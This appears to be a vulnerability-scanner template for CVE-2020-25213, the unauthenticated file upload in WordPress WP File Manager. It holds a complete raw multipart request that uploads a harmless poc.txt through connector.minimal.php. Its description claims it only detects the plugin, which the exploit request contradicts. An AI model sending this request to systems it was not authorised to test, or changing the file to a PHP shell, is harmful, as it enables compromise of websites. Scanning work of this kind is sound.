62 lines
1.7 KiB
YAML
62 lines
1.7 KiB
YAML
id: CVE-2020–25213
|
||
|
||
info:
|
||
name: WP File Manager RCE
|
||
author: foulenzer
|
||
severity: critical
|
||
description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability.
|
||
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25213
|
||
tags: cve,cve2020,wordpress,rce
|
||
|
||
# Uploaded file will be accessible at:-
|
||
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
|
||
|
||
requests:
|
||
- raw:
|
||
- |
|
||
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
|
||
Host: {{Hostname}}
|
||
Accept: */*
|
||
Content-Length: 608
|
||
Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48
|
||
Connection: close
|
||
|
||
--------------------------ca81ac1fececda48
|
||
Content-Disposition: form-data; name="reqid"
|
||
|
||
17457a1fe6959
|
||
--------------------------ca81ac1fececda48
|
||
Content-Disposition: form-data; name="cmd"
|
||
|
||
upload
|
||
--------------------------ca81ac1fececda48
|
||
Content-Disposition: form-data; name="target"
|
||
|
||
l1_Lw
|
||
--------------------------ca81ac1fececda48
|
||
Content-Disposition: form-data; name="mtime[]"
|
||
|
||
1576045135
|
||
--------------------------ca81ac1fececda48
|
||
Content-Disposition: form-data; name="upload[]"; filename="poc.txt"
|
||
Content-Type: text/plain
|
||
|
||
poc-test
|
||
--------------------------ca81ac1fececda48--
|
||
|
||
matchers-condition: and
|
||
matchers:
|
||
- type: word
|
||
words:
|
||
- poc.txt
|
||
- added
|
||
condition: and
|
||
|
||
- type: word
|
||
words:
|
||
- application/json
|
||
part: header
|
||
|
||
- type: status
|
||
status:
|
||
- 200 |